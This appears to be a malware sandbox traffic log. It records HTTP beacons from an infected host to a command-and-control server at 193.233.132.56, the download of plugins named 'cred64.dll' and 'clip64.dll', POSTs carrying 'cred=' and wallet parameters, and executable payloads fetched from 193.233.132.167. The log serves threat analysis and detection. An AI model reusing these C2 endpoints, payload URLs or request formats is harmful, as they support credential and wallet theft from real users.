                              Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1713490393138Host: self.events.data.microsoft.comContent-Length: 7974Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000054001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000055001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYyMQ==Host: 193.233.132.56Content-Length: 4781Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000056001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000057031&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
